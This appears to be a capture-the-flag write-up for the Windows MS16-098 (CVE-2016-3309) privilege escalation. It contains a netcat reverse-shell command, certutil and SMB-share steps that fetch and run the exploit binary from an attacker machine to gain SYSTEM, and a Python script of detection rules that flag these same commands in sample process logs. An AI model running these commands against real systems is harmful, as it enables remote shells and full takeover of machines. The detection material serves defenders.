| CVE / MS | Title | Affected versions |
|---|---|---|
| CVE-2016-3309 / MS16-098 | RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects | win_7 version_1511 arc_x64, win_7 version_1511 arc_x86, win_server_2008 sp_2 arc_x86, win_10 sp_1 arc_x86, win_10 sp_1 arc_x64, win_server_2012 arc_x86, win_7 version_1607 arc_x64, win_vista sp_2 arc_x64, win_8.1 arc_x64, win_server_2008 sp_2 arc_x64, win_7 arc_x64, win_8.1 arc_x86, win_7 arc_x86, win_7 version_1607 arc_x86, win_vista sp_2 arc_x86, win_server_2008 sp_1 arc_x64, win_server_2008 sp_1 arc_x86 |
Important note: this POC has only been tested on Windows 8.1 x64 and Windows 2012 R2 x64 and may not work on other versions. Do NOT run this POC from a PowerShell reverse shell. If you find yourself in a PowerShell session, as I did, upload a netcat binary and send a cmd shell back to your local netcat listener:

```
.\nc64.exe <Your-Machine-IP> 9000 -e cmd
```
CTF boxes usually have no outbound Internet access, so in that case download the POC binary to your local machine from here, then start a Python SimpleHTTPServer on port 8000. On the target machine:

```
certutil.exe -urlcache -split -f "http://<Your-Machine-IP>:8000/41020.exe" 41020.exe
.\41020.exe
```
If the program did not hang, run whoami: you are already SYSTEM. Alternatively, start an SMB server on your local machine using impacket-smbserver:

```
sudo impacket-smbserver myshare `pwd` -smb2
```

and run the exe directly from the network share like this:

```
\\<Your-Machine-IP>\myshare\41020.exe
```
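From the defender's side, every step in this write-up leaves distinctive process-creation telemetry: certutil used as a downloader, netcat spawning cmd, and an executable launched straight from a UNC path. The script below is an added example (not part of the original write-up) that runs three such rules over constructed, Sysmon-style sample events; the IP address, user name and field names are assumptions.

```python
import re

# Constructed sample events with simplified Sysmon Event ID 1 fields (image, cmdline).
# The IP 10.10.14.5 and user "bob" are made up for this example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": 'certutil.exe -urlcache -split -f "http://10.10.14.5:8000/41020.exe" 41020.exe'},
    {"image": r"C:\Users\bob\Desktop\41020.exe", "cmdline": r".\41020.exe"},
    {"image": r"C:\Users\bob\nc64.exe", "cmdline": r".\nc64.exe 10.10.14.5 9000 -e cmd"},
    {"image": r"\\10.10.14.5\myshare\41020.exe", "cmdline": r"\\10.10.14.5\myshare\41020.exe"},
    # Benign certutil use: no -urlcache, so it must not fire.
    {"image": r"C:\Windows\System32\certutil.exe", "cmdline": "certutil.exe -hashfile setup.msi SHA256"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# certutil invoked with -urlcache and either a URL or -split: file download, not cert work.
CERTUTIL_DL = re.compile(r"\bcertutil(\.exe)?\b.*-urlcache.*(https?://|-split)", re.I)
# nc / nc64 / ncat with "-e ...cmd": a shell handed to a remote listener.
NC_EXEC = re.compile(r"\bnc(64|at)?(\.exe)?\b.*\s-e\s+\S*cmd", re.I)

RULES = [
    ("certutil_urlcache_download", lambda e: CERTUTIL_DL.search(e["cmdline"]) is not None),
    ("netcat_exec_redirect", lambda e: NC_EXEC.search(e["cmdline"]) is not None),
    # Image path starting with "\\" means the binary was executed directly from a share.
    ("exec_from_unc_path", lambda e: e["image"].startswith("\\\\")),
]


def classify(event):
    """Return the names of all rules that match one process-creation event."""
    return [name for name, pred in RULES if pred(event)]


def scan(events):
    """Return (cmdline, matched rules) for every event that triggers at least one rule."""
    findings = []
    for e in events:
        hits = classify(e)
        if hits:
            findings.append((e["cmdline"], hits))
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):28} <- {cmdline}")
```

The UNC rule keys on the image path rather than the command line, since the share path is what the loader actually mapped; the certutil rule deliberately ignores -hashfile and other legitimate uses.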